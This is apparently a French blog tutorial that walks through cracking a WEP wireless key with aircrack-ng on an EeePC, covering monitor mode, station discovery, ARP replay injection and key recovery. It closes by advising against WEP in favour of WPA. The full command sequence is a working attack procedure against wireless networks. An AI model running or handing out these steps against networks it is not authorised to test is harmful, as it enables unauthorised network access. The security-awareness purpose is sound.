version courte

sudo airmon-ng stop ath0
sudo airmon-ng start wifi0

sudo airodump-ng ath0

sudo airodump-ng --write <nom_du_fichier_capture> --bssid <adresse_MAC_AP> --channel <num_canal>ath0

sudo aireplay-ng -3 -e ESSID -b <adresse_MAC_AP> -h <adresse_MAC_station> ath0

sudo aircrack-ng -x /tmp/wifikrk/*.cap

Avertissement

Bon, compte tenu de mon équipement et de mon principal (unique ?) lecteur, je restreint volontairement ce billet aux principales commandes à utiliser dans un environnement EeePC[1] / xUbuntu.

pour maximiser l'affichage du terminal sur le meeeneee ecran, j'utilse xterm : Alt+F2 puis xterm

Pour un article plus généraliste[2], on peut consulter www.tuto-fr.com/tutoriaux/tutorial-crack-wep-aircrack.php

Prérequis

la carte wifi correctement configurée et démarrée et la suite aircrack installée

pour vérifier que la carte wifi soit bien montée :

iwconfig

Installation de la suite AirCrack-NG

sudo aptitude install aircrack-ng

ou bien

sudo apt-get install aircrack-ng

Passage de la carte en mode écoute (promiscuous mode)

sudo airmon-ng stop ath0

puis

sudo airmon-ng start wifi0

repérage des Hots Spots disponibles

sudo airodump-ng ath0

La 1ère partie liste les Points d'Accès WIFI, a 2nde les stations de travail emettant en WIFI

On repère notre Hot Spot bien protégé(?) en WEP (colonnes privacy et cipher), et on note son adresse MAC c'est le 1er champ de la ligne, sous la forme 00:xx:xx:xx:xx:xx Le nom du Hot Spot est le denier champ de la ligne.

Constatation 1 :

On peut lister en clair les noms de tous les Points d'Accès à proximité, même si le routeur est configuré pour ne pas diffuser le ESSID sur le réseau.

Maintenant que on a repéré le Point d'accès WIFI, on a besoin de récupérer l'dresse MAC d'une station connectée sur ce HotSpot

Il s'agit donc de repérer parmi les ordinateurs qui émettent du traffic en WIFI disponibles, une station de travail connectée sur l'AP dojt nous voulons récupérer la clé. l'adresse MAC de la station est le 1er champ des lignes de descriptions des stations et les 2 deniers champs nous révèlent à quel AP il est connecté : BSSID (adresse MAC de l'AP) et Probed ESSID (ESSID de l'AP)

enregistrement du traffic

sudo airodump-ng write <nom_du_fichier_capture> bssid <adresse_MAC_AP> ath0

Récupération de paquets utilisables

Dès 2001 la découverte d'une faille dans le cryptage de la clé WEP permettait après avoir récupéré suffisamment de paquets de casser une clé WEP.

Nous allons maintenant emettre des paquets erronés semblant provenir d'une station de travail associée au Hot Spot ; lequel en répondant nous fournira des paquets utilisables pour craquer sa clé

Cette méthode de récupération de vecteurs d'initialistion s'appelle réinjection de requêtes ARP, le but étant de récupérer suffisamment de vecteur d'initialistions (IVs)

sudo aireplay-ng -3 -e ESSID -b @_mac_AP -h @_mac_station ath0

Cassage de la clé

Dès que le fichier de capture atteint les 500k, on oeut déjà faire un 1er test

sudo aircrack-ng -x *.cap

remarque : si les paquets capturés concernent plusieurs AP, un menu intermédiaire permet de choisir le point d'accès cible

Conclusion :

10 minutes ont suffit pour récupérer la clé et se connecter sur le réseau. Le WEP présente d'autres graves lacunes de sécurité[3]) En définitive, qu'il s'agisse d'un usage particulier ou professionnel, on ne doit jamais utiliser le cryptage WEP. On préferera une sécuristion WPA, voire le couplage avec un Radius pour les eentreprises. Il existe aussi la solution d'installer un portail captif comme chilli

Notes

[1] carte WIFI chipset Atheros, driver libre madwifi

[2] ou pour avoir de nombreuses saisies d'écran

[3] : Concernant l’intégrité des données, le CRC32 – implanté dans le WEP – comporte une faille permettant la modification de la chaîne de vérification du paquet à comparer à la chaîne finale issue des données reçues, ce qui permet à un pirate de faire passer ses informations pour des informations valides (source : www.commentcamarche.net